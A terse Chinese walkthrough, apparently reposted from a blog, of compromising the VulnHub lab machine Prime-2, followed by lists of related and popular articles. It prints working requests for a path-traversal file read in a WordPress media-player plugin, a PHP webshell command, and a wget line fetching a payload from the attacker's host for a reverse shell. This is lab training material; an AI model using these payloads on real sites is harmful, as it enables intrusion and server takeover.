vulnhub靶机Prime-2

2023-12-17 02:00:03
开发
40

下载地址：Prime (2021): 2 ~ VulnHub

主机发现

目标145

端口扫描

端口服务扫描

漏洞扫描

先去看一下80

扫目录

发现点不一样的

Wordpress（记住还是要用api）

好洞出来了看看利用方法

192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

成了，这边没什么线索了。去另外一个web看看

看看文件一个一个看吧

在uploads里面

一句话木马

192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home//jarves/upload/shell.php&cmd=whoami

反弹shell

http://192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home//jarves/upload/shell.php&cmd=wget%20http://192.168.21.131:8000/1.php%20-O%20/tmp/1.php编辑

192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home//jarves/upload/shell.php&cmd=cat /tmp/1.php

写入成功

包含shell

192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../tmp/1.php

Smb去看一下，一直没用，肯定有用

连

直接ssh密钥生成

远程登入

免密登入成功

啥也没有

构建

新的文件上传就可以

进容器

结束

原文地址:https://blog.csdn.net/m0_73248913/article/details/134909683 本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：https://www.suanlizi.com/kf/1736083781011509248.html 如若内容造成侵权/违法违规/事实不符，请联系《酸梨子》网邮箱：1419361763@qq.com进行投诉反馈，一经查实，立即删除！

阅读全部

相关推荐

vulnhub靶机Prime-2

2023-12-17 02:00:03 41 阅读
vuInhub靶场实战系列--prime:2

2023-12-17 02:00:03 12 阅读
[Vulnhub靶机] DriftingBlues: 2

2023-12-17 02:00:03 37 阅读
Vulnhub靶机：driftingblues 2

2023-12-17 02:00:03 29 阅读
prime1--vulnhub靶场通关教程

2023-12-17 02:00:03 11 阅读
Vulnhub靶机：hacksudo2 (HackDudo)

2023-12-17 02:00:03 26 阅读
vulnhub靶机实战_DC-2

2023-12-17 02:00:03 8 阅读
vuInhub靶场实战系列--prime:1

2023-12-17 02:00:03 9 阅读
Prime(VulnHub)

2023-12-17 02:00:03 31 阅读
[VulnHub靶机渗透] Kioptrix1.2

2023-12-17 02:00:03 18 阅读

热门阅读

编译 pywinhook v1.6.2 的环境设置和步骤

2023-12-17 02:00:03 40 阅读
【专题】最小生成树（prim算法、kruscal算法）

2023-12-17 02:00:03 40 阅读
Unity项目里Log系统该怎么设计

2023-12-17 02:00:03 30 阅读
docker配置容器内访问主机服务

2023-12-17 02:00:03 40 阅读
[Verilog] 设计方法和设计流程

2023-12-17 02:00:03 38 阅读
使用axios的详细图文教程

2023-12-17 02:00:03 37 阅读
Fuzz进阶教学——基于机器学习的模糊测试相关工作

2023-12-17 02:00:03 33 阅读
【原创】海为PLC与RS-WS-ETH-6传感器的MUDBUS_TCP通讯

2023-12-17 02:00:03 34 阅读
什么是DMAC?

2023-12-17 02:00:03 33 阅读
餐饮企业需求-数据准备

2023-12-17 02:00:03 38 阅读
axios+echarts

2023-12-17 02:00:03 30 阅读
vue的slot插槽详解

2023-12-17 02:00:03 27 阅读
react受控组件和非受控组件区别

2023-12-17 02:00:03 37 阅读
大语言模型续写completions

2023-12-17 02:00:03 40 阅读
input , change ,blur 事件的区别，以及在vue和react中的表现

2023-12-17 02:00:03 39 阅读
linux(6)：linux用户和权限

2023-12-17 02:00:03 41 阅读
建立海外SD-WAN专线网络的成本分析

2023-12-17 02:00:03 45 阅读
数据库_mongoDB

2023-12-17 02:00:03 35 阅读
050:vue项目webpack打包，大文件分成几个小文件的方法

2023-12-17 02:00:03 34 阅读
正式开通运营！“一应黔行”服务网点进驻贵阳地铁3号线

2023-12-17 02:00:03 37 阅读
动态内存管理

2023-12-17 02:00:03 39 阅读
Ubuntu 常用命令之 ls 命令用法介绍

2023-12-17 02:00:03 37 阅读
如何禁止孩子在电脑中浏览某些网页？

2023-12-17 02:00:03 32 阅读
2023-12-13 VsCode + CMake + Qt环境搭建

2023-12-17 02:00:03 43 阅读
【最新版】PyCharm实用插件

2023-12-17 02:00:03 38 阅读
【PostgreSQL】从零开始:（一）初识PostgreSQL

2023-12-17 02:00:03 38 阅读
[Verilog] Verilog 简介

2023-12-17 02:00:03 38 阅读
verilog基础语法-计数器

2023-12-17 02:00:03 33 阅读
shell编程-sort命令详解（超详细）

2023-12-17 02:00:03 38 阅读
AI视频-stable-video-diffusio介绍

2023-12-17 02:00:03 38 阅读